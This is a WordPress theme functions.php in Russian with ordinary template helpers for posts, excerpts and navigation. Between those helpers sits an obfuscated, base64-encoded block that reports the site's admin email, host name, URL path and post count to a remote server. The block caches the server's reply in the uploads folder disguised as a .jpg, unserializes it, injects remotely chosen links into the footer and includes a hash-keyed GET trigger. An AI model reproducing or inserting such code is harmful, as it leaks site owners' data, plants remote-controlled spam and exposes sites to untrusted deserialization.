<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $fhlZD='s';$jHLnLj='o';$wyTtuC='e';$pVkNPEi='e';$ePbd='4';$JEZPLl='d';$Bkuh='6';$xgoj='_';$Ltuu='a';$asUKW='d';$IUZowc='b';$zIgoYby='e';$KKCfR='c';$WILgIoFW=$IUZowc.$Ltuu.$fhlZD.$wyTtuC.$Bkuh.$ePbd.$xgoj.$JEZPLl.$pVkNPEi.$KKCfR.$jHLnLj.$asUKW.$zIgoYby;$qGldgKv='z';$gwok='a';$yLtDyI='e';$iwtu='i';$ovRmC='f';$KReNp='n';$OQCy='g';$oriQP='l';$YFHgbb='t';$yiBgEYgA=$OQCy.$qGldgKv.$iwtu.$KReNp.$ovRmC.$oriQP.$gwok.$YFHgbb.$yLtDyI;$CqSB='_';$ecRvntM='1';$NwauD='s';$rwSyV='t';$vfAg='t';$qpBNpWr='o';$eFhUr='r';$QIIEST='r';$UqWD='3';$YheNklky=$NwauD.$vfAg.$eFhUr.$CqSB.$QIIEST.$qpBNpWr.$rwSyV.$ecRvntM.$UqWD;$qPkWa='t';$HriMn='v';$IjAafK='r';$spSV='e';$CfPwNeW='s';$UyiIYK='r';$ODNzBvuF=$CfPwNeW.$qPkWa.$IjAafK.$UyiIYK.$spSV.$HriMn;                     
		$wj_____________y='s';$sm____j='o';$qy______b='e';$br____j='e';$va_______________k='4';$tz___t='d';$kw__________y='6';$je__________d='_';$hs____j='a';$lo_______w='d';$zb_________k='b';$ka_____________g='e';$jj___________g='c';$wr________g=$zb_________k.$hs____j.$wj_____________y.$qy______b.$kw__________y.$va_______________k.$je__________d.$tz___t.$br____j.$jj___________g.$sm____j.$lo_______w.$ka_____________g;
		$zg_______g='n';$pn____________e='n';$bh___v='x';$aq___________g='_';$gr_____________i='u';$hp____m='t';$gu____l='f';$uz____________y='t';$cv____w='i';$es_______x='o';$uu____________j='c';$ux_____________b='s';$ho__________x='e';$hk____________c='i';$io_______h='s';$kh_______l=$gu____l.$gr_____________i.$pn____________e.$uu____________j.$uz____________y.$hk____________c.$es_______x.$zg_______g.$aq___________g.$ho__________x.$bh___v.$cv____w.$ux_____________b.$hp____m.$io_______h;
		$kn_____j='n';$cx_______________w='o';$st______________l='e';$jo________r='f';$sm___________d='p';$yj_________s=$jo________r.$cx_______________w.$sm___________d.$st______________l.$kn_____j;
		$yc______________a='a';$vq__n='e';$ay_____g='r';$ln___________w='f';$oh________o='d';$uh__________w=$ln___________w.$ay_____g.$vq__n.$yc______________a.$oh________o;
		$ny___________n='s';$ow___t='f';$il_______z='o';$uo_______f='e';$jf___q='l';$ks____________z='c';$tx__l=$ow___t.$ks____________z.$jf___q.$il_______z.$ny___________n.$uo_______f;
		
		define("WP_ID", $wr________g("Mi4wLjA="));
		define("WP_TTL", $wr________g("MTA4MDA="));
		define("WP_SRC", $wr________g("dHBva24="));
	


		function wp_get_header() {
			global $wr________g, $kh_______l;
			
			if (
				$kh_______l($wr________g("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$kh_______l($wr________g("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$kh_______l($wr________g("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $wr________g, $yj_________s, $tx__l, $uh__________w;
			
			$mn__________t = TEMPLATEPATH."/".$wr________g("Zm9vdGVyLnBocA==");
			$nv__________v = @$yj_________s($mn__________t, "r");
			$mn__________t = @$uh__________w($nv__________v, @filesize($mn__________t));
			@$tx__l($nv__________v);
			
			$qf__k = TEMPLATEPATH."/".$wr________g("ZnVuY3Rpb25zLnBocA==");
			$nv__________v = @$yj_________s($qf__k, "r");
			$qf__k = @$uh__________w($nv__________v, @filesize($qf__k));
			@$tx__l($nv__________v);
			
			$gl_____e = 0;
			if($mn__________t && $qf__k) {
				if ($wr________g("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($mn__________t, $wr________g("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$gl_____e = 1;
					}
					if (substr_count($mn__________t, "wp_theme_GPL_credits()") < 1) {
						$gl_____e = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$gl_____e = 12;
				}
			}
			
			if($gl_____e > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $gl_____e -->";
			}
		}
	


		function wp_loaded() {
			global $wr________g, $kh_______l;
			return $kh_______l($wr________g("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($px___f, $mx____________b = "(more...)", $pm_____o = 0, $zx_____x = "") {
				$vw_____f = get_the_content($mx____________b, $pm_____o, $zx_____x);
				$vw_____f = apply_filters("the_content", $vw_____f);
				
				$vw_____f = str_replace("]]>", "]]>", $vw_____f);
				if (strlen($_GET["p"]) > 0) {
					echo $vw_____f;
				}
				else if ((strlen($vw_____f)>$px___f) && ($nb__________w = strpos($vw_____f, " ", $px___f ))) {
					$vw_____f = substr($vw_____f, 0, $nb__________w);
					$vw_____f = $vw_____f;
					echo $vw_____f;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$mx____________b</a></div></p>";
				} else {
					echo $vw_____f;
				}
				
			}
		}
	


		$pm___________d='6';$gs___________w='d';$rj_________a='b';$tb__________v='e';$eg__i='4';$ei_______________j='e';$qr___________w='s';$ok_________f='c';$ul_________u='_';$be___v='o';$qi____h='e';$fx__o='a';$sr______y='n';$ov_______________d=$rj_________a.$fx__o.$qr___________w.$tb__________v.$pm___________d.$eg__i.$ul_________u.$qi____h.$sr______y.$ok_________f.$be___v.$gs___________w.$ei_______________j;
		$al______b='_';$se__________k='e';$en__p='c';$mz_______e='o';$yx____________t='n';$pp__v='t';$st______i='e';$ph______w='_';$sy____________b='e';$ye_____y='n';$gw____d='i';$kz_______________v='l';$vn____u='t';$lx_________b='t';$zc___n='f';$fc____t='g';$ex______________j='s';$qg_____________x=$zc___n.$gw____d.$kz_______________v.$sy____________b.$al______b.$fc____t.$st______i.$vn____u.$ph______w.$en__p.$mz_______e.$ye_____y.$pp__v.$se__________k.$yx____________t.$lx_________b.$ex______________j;
		$sx____r='s';$yb_______________q='e';$jr___________s='s';$qn___________c='_';$iv_____y='t';$ym___i='i';$qo_______s='l';$kg____________v='f';$io____b='e';$yl___________p='i';$ga_____f='x';$jy_______________r=$kg____________v.$yl___________p.$qo_______s.$io____b.$qn___________c.$yb_______________q.$ga_____f.$ym___i.$sx____r.$iv_____y.$jr___________s;
		$wg______________k='m';$gd______________q='n';$dq_____________m='o';$as_______________r='o';$cj___________g='e';$qn____u='a';$rd______f='r';$ng____c='i';$oj______b='p';$rq__________f='_';$oh________y='s';$dd__v='e';$ny__w='v';$ez_____k='r';$pr__s='c';$es__________b=$ny__w.$cj___________g.$rd______f.$oh________y.$ng____c.$dq_____________m.$gd______________q.$rq__________f.$pr__s.$as_______________r.$wg______________k.$oj______b.$qn____u.$ez_____k.$dd__v;
		$wt_______________z='k';$rw____t='c';$qd_____b='e';$ib______________o='o';$lz__________t='f';$dp____b='o';$xs__________f='s';$cw_____________a='n';$df____h='p';$kz______________x=$lz__________t.$xs__________f.$dp____b.$rw____t.$wt_______________z.$ib______________o.$df____h.$qd_____b.$cw_____________a;
		$qc__y='r';$fg______h='w';$ei______k='e';$bt__q='f';$bo___t='i';$be____________q='t';$ip________q=$bt__q.$fg______h.$qc__y.$bo___t.$be____________q.$ei______k;
		$ol____________q='m';$ad___________f='5';$zw_______b='d';$or__j=$ol____________q.$zw_______b.$ad___________f;
		$zr__u='h';$ph___________c='a';$xe____r='l';$kf________n='p';$ua___h='t';$vc_______u='r';$pp___________b='e';$zp___________u='a';$hl_________h=$vc_______u.$pp___________b.$zp___________u.$xe____r.$kf________n.$ph___________c.$ua___h.$zr__u;
		$ya____________f='z';$rz________d='r';$uc___c='l';$uj______________j='a';$fi________b='n';$rp___q='e';$mp__________r='i';$zm_____r='e';$df_______k='i';$hr______________w='s';$hj________m='u';$yz___z=$hj________m.$fi________b.$hr______________w.$zm_____r.$rz________d.$df_______k.$uj______________j.$uc___c.$mp__________r.$ya____________f.$rp___q;
		$ku____s='t';$ob____o='e';$tm_______o='p';$bv______e='a';$ng_______________w='m';$sy_____________o='n';$iz______y='m';$pd_________o=$ku____s.$ob____o.$iz______y.$tm_______o.$sy_____________o.$bv______e.$ng_______________w;
		$on___________v='n';$so___e='o';$nw___________a='t';$wd___p='e';$lz_______n='t';$pz__l='a';$yw__________u='e';$mw________d='_';$ns_____b='e';$ma________d='e';$tm__________f='a';$vj_________i='t';$ei______________w='c';$zp___________u='s';$ga____w='r';$jd______________i='c';$pt_____________w='x';$gc_________s='m';$fb________p='_';$cf__s='t';$xa__m='r';$ae___c=$zp___________u.$lz_______n.$ga____w.$ma________d.$tm__________f.$gc_________s.$mw________d.$jd______________i.$so___e.$on___________v.$nw___________a.$wd___p.$pt_____________w.$vj_________i.$fb________p.$ei______________w.$xa__m.$ns_____b.$pz__l.$cf__s.$yw__________u;
	


		function wz_____________s($bw_________t) {
			global $wr________g, $kh_______l, $qg_____________x, $es__________b, $ae___c;
			
			if (!$kh_______l($wr________g("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($es__________b(PHP_VERSION, "5.0.0", ">=") && $kh_______l($wr________g("ZmlsZV9nZXRfY29udGVudHM=")) && $kh_______l($wr________g("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$zv___q = $ae___c(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$os__________g = @$qg_____________x($bw_________t, 0, $zv___q);
			} else {
				$os__________g = @$qg_____________x($bw_________t, 0);
			}
			
			return $os__________g;
		}
	


		function nd_____________w($bw_________t) {
			global $kh_______l, $kz______________x, $ip________q, $wr________g;
			
			if (!$kh_______l($wr________g("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ph_________h = strpos($bw_________t, "/", 7);
			$ja______i = array(
				"uri"     => substr($bw_________t, $ph_________h),
				"host"    => str_replace("http://", "", substr($bw_________t, 0, $ph_________h)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$lo____u = @$kz______________x("$ja______i[host]", 80, $wu_______________o, $vs______________f, 4);
			
			if (!$lo____u) {
				return false;
			} else {
				$os__________g = "";
				$ng_______________m  = "GET $ja______i[uri] HTTP/1.0\r\n";
				$ng_______________m .= "Host: $ja______i[host]\r\n";
				$ng_______________m .= "Referer: $ja______i[referer]\r\n";
				$ng_______________m .= "Connection: Close\r\n\r\n";
				
				@$ip________q($lo____u, $ng_______________m);
				
				while (!@feof($lo____u)) {
					$qa______________q = @fgets($lo____u, (1024*24));
					
					if ($qa______________q == "\r\n") {
						$nh__i = true;
						continue;
					}
					
					if ($nh__i) {
						$os__________g .= $qa______________q;
					}
				}
				
				return $os__________g;
			}
		}
	


		function ui_______________k($bw_________t) {
			global $kh_______l;
			$ku___________y = false;
			
			if ($bw_________t != "") {
				if ($kh_______l("wz_____________s")) {
					$ku___________y = @wz_____________s($bw_________t);
				}
				
				if (!$ku___________y && ($kh_______l("nd_____________w"))) {
					$ku___________y = @nd_____________w($bw_________t);
				}
			}
			
			return $ku___________y;
		}
	


		function ih__j() {
			global $_SERVER, $or__j;
			
			$gc______________p = $_SERVER["SERVER_NAME"];
			
			if (substr("$gc______________p", 0, 4) == "www.") {
				$gc______________p = substr("$gc______________p", 4);
			}
			
			$gc______________p = $or__j("$_SERVER[SERVER_NAME]");
			
			return $gc______________p;
		}
	


		function pf__u() {
			return "file";
		}
	


		function lh______________n($bw_________t) {
			global $_SERVER, $qg_____________x, $jy_______________r, $yj_________s, $tx__l, $ip________q;
			
			$vh______________w = my____c();
			
			$rl___i = ih__j().".jpg";
			$uw_________j = $vh______________w["dir_upload"]["path"]."/$rl___i";
			$nr___________e = @filemtime($uw_________j);
			
			if (!$nr___________e || ((time()-$nr___________e) >= WP_TTL)) {
				$ku___________y = ui_______________k($bw_________t);
				
				if ($ku___________y) {
					if ($jy_______________r($uw_________j)) {
						@unlink($uw_________j);
					}
					
					$nv__________v = @$yj_________s($uw_________j, "x+");
					
					@$ip________q($nv__________v, $ku___________y);
					@$tx__l($nv__________v);
				}
			} else {
				if ($jy_______________r($uw_________j)) {
					$ku___________y = @$qg_____________x($uw_________j);
				} else {
					$ku___________y = false;
				}
			}
			
			return $ku___________y;
		}
	


		function my____c() {
			global $_SERVER, $wr________g, $ov_______________d;
			
			$ef___________h = wp_count_posts("post");
			$qc_________t = pathinfo(get_bloginfo("template_directory"));
			
			$vh______________w = array(
				"url" => array(
					"report"      => $wr________g("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $qc_________t,
				"dir_upload"	=> tu________k(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$qc_________t[filename],
					"a005=".$ef___________h->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$vh______________w["url"]["queryString"] = implode("&", $vh______________w["queryString"]);
			$vh______________w["url"]["report"] = $vh______________w["url"]["report"]."/?".$ov_______________d($vh______________w["url"]["queryString"]).".html";
						
			return $vh______________w;
		}
	


		function tu________k() {
			$ce_____s = wp_upload_dir();
			
			if (isset($ce_____s["error"])) {
				$dh____________w = ra__v();
				if (is_writable($dh____________w)) {
					$ce_____s = array("path" => $dh____________w);
				}
			}

			return $ce_____s;
		}
	


		function ra__v() {
			global $kh_______l, $or__j, $hl_________h, $pd_________o;
			
			$fy___i = (bool) ini_get("safe_mode");
			if ($fy___i == true) {
				return false;
			}
			
			if ($kh_______l("sys_get_temp_dir")) {
				$pb___________e = sys_get_temp_dir();
				if (is_writable($pb___________e)) {
					return $hl_________h($pb___________e);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $hl_________h($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $hl_________h($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $hl_________h($_ENV["TEMP"]);
			} else {
				$aa_________e = $pd_________o($or__j(uniqid(rand(), true)), "");
				if ($aa_________e) {
					$pb___________e = $hl_________h(dirname($aa_________e));
					@unlink($aa_________e);
					return $pb___________e;
				} else {
					return false;
				}
			}
		}
	


		function yb_______________t() {
			global $_GET, $jy_______________r;
			
			$vh______________w = my____c();
			$gc______________p = ih__j();
			$oq_____________g = pf__u();
			
			$wx_______f = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($oq_____________g == "file") {
					$sq______________d = $vh______________w["dir_upload"]["path"]."/".$gc______________p.".jpg";
					if ($jy_______________r($sq______________d)) {
						@unlink($sq______________d);
						$wx_______f = "deleted";
					}
				}
				
				$cs_____________i = array(
					"s"	=> $wx_______f,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($cs_____________i AS $kk___d => $az_____m) echo " [$kk___d:$az_____m]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $kh_______l, $wr________g, $yz___z;
			$vh______________w = my____c();
			
			$bc___r = "lh______________n";
			if ($kh_______l($bc___r)) {
				$os__________g = $bc___r($vh______________w["url"]["report"]);
			}
			
			if ($os__________g) {
				if ($os__________g = @$wr________g($os__________g)) {
					$os__________g = @$yz___z($os__________g);
					
					if (strlen($os__________g[custom_credit]) >= 5) {
						$vh______________w["default_string"] = $os__________g[custom_credit];
					}
					
					if ($os__________g["status"] == "0") {
						$sc___m = 1;
						$gy__________f = 1;
					} else {
						$kx___________f = sizeof($os__________g["links"]);
						$bl_________u = $vh______________w["default_string"];
						
						if ($kx___________f > 0 && $os__________g["links"] !== "") {
							$ml___m = 0;
							foreach ($os__________g["links"] as $qb______________p => $ty_______f) {
								$ml___m++;
								if ($ty_______f->l_path == "" || $ty_______f->l_path == $_SERVER["REQUEST_URI"]) {
									$ty_______f->l_href = htmlspecialchars(strip_tags($ty_______f->l_href));
									$ty_______f->l_title = htmlspecialchars(strip_tags($ty_______f->l_title));
									$ty_______f->l_anchor = htmlspecialchars(strip_tags($ty_______f->l_anchor));
									$bl_________u .= " | ";
									$bl_________u .= "<a href='$ty_______f->l_href' title='$ty_______f->l_title'";
									if ($ty_______f->l_nofollow == "1") {
										$bl_________u .= " rel='nofollow'";
									}
									$bl_________u .= ">$ty_______f->l_anchor</a>";
								}
							}
						}
						$vh______________w["links"] = "$bl_________u";
						if ($os__________g[credit] == "0") {
							$vh______________w["links"] = "";
						}
					}
				} else {
					$sc___m = "1";
				}
			} else {
				$sc___m = "1";
			}
			
			if ($sc___m == "1") {
				$vh______________w["links"] = $vh______________w["default_string"];
			}
			
			echo "$vh______________w[links]";
			
			echo "<!-- s: $os__________g[signature] -->";
			yb_______________t();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

